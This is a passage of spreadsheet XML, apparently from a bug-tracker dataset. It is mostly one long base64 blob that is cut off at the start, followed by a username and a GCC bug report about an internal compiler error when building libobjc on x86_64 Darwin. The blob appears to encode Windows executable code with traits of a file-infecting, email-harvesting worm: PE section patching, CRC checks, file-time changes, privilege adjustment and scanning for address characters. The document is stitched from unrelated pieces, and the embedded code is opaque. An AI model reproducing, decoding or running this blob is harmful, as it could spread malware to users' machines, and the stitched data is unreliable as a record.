 +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</t>
  </si>
  <si>
    <t>zstoddard</t>
  </si>
  <si>
    <t>GCC-58269</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE when building libobjc on x86_64-apple-darwin*  after revision 201915</t>
  </si>
  <si>
    <t>Created attachment 30715
Preprocessed file
On x86_64-apple-darwin10 building libobjc gives the following ICE after revision 201915
...
libtool: compile:  /opt/gcc/build_w/./gcc/xgcc -B/opt/gcc/build_w/./gcc/ -B/opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/bin/ -B/opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/lib/ -isystem /opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/include -isystem /opt/gcc/gcc4.9w/x86_64-apple-darwin10.8.0/sys-include /opt/gcc/work/libobjc/sendmsg.c -c -I. -I/opt/gcc/work/libobjc -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DIN_GCC -DIN_TARGET_LIBS -fno-strict-aliasing -fexceptions -I/opt/gcc/work/libobjc/../gcc -I/opt/gcc/work/libobjc/../gcc/config -I../.././gcc -I/opt/gcc/work/libobjc/../libgcc -I../libgcc -I/opt/gcc/work/libobjc/../include  -fno-common -DPIC -o .libs/sendmsg.o
/opt/gcc/work/libobjc/sendmsg.c: In function '__objc_word_forward':
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: in check_rtl at lra.c:2034
 }
 ^
/opt/gcc/work/libobjc/sendmsg.c:848:1: internal compiler error: Abort trap
xgcc: internal compiler error: Abort trap (program cc1)
